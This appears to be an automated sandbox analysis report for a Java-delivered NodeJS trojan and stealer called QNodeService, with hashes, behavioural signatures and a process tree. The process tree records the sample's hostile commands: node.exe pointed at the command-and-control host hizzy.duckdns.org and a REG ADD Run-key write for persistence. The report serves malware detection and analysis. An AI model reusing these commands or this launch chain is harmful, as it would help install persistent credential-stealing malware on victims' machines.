Analysis
-
max time kernel
134s -
max time network
137s -
platform
windows10_x64 -
resource
win10 -
submitted
05-10-2020 13:17
Static task
static1
Behavioral task
behavioral1
Sample
023abdf2337367286dfacb24c1083b7f.jar
Resource
win7
Behavioral task
behavioral2
Sample
023abdf2337367286dfacb24c1083b7f.jar
Resource
win10
General
-
Target
023abdf2337367286dfacb24c1083b7f.jar
-
Size
278KB
-
MD5
023abdf2337367286dfacb24c1083b7f
-
SHA1
c2d901942b56d9f416e60f4a5e016b3cde322aba
-
SHA256
b6b41f00daa713f98a2d89aae60de306688576cfe7e9186eb0d8e4821a6800b6
-
SHA512
5e26091512925b28909b01c7aaabdd63f0c1f7a39461b5f450f2389dc4d6e26dc3e3d920035dccf10487afb8ad1ff6f99b272b5210be1a533ed56749c8e5a1e7
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3828 node.exe 1440 node.exe 3868 node.exe -
Loads dropped DLL 6 IoCs
pid Process 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\e860d65c-bb6b-4de2-a521-0aa47c45c22a = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad95-166.dat js behavioral2/files/0x000100000001ad95-170.dat js behavioral2/files/0x000100000001ad95-174.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 wtfismyip.com 15 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3828 node.exe 3828 node.exe 3828 node.exe 3828 node.exe 1440 node.exe 1440 node.exe 1440 node.exe 1440 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe 3868 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 976 wrote to memory of 1664 976 java.exe 74 PID 976 wrote to memory of 1664 976 java.exe 74 PID 1664 wrote to memory of 3828 1664 javaw.exe 78 PID 1664 wrote to memory of 3828 1664 javaw.exe 78 PID 3828 wrote to memory of 1440 3828 node.exe 80 PID 3828 wrote to memory of 1440 3828 node.exe 80 PID 1440 wrote to memory of 3868 1440 node.exe 81 PID 1440 wrote to memory of 3868 1440 node.exe 81 PID 3868 wrote to memory of 4040 3868 node.exe 83 PID 3868 wrote to memory of 4040 3868 node.exe 83 PID 4040 wrote to memory of 2012 4040 cmd.exe 84 PID 4040 wrote to memory of 2012 4040 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\023abdf2337367286dfacb24c1083b7f.jar1⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\6fbf5058.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain hizzy.duckdns.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DBWHVN\boot.js --hub-domain hizzy.duckdns.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DBWHVN\boot.js --hub-domain hizzy.duckdns.org5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e860d65c-bb6b-4de2-a521-0aa47c45c22a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e860d65c-bb6b-4de2-a521-0aa47c45c22a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2012
-
-
-
-
-
-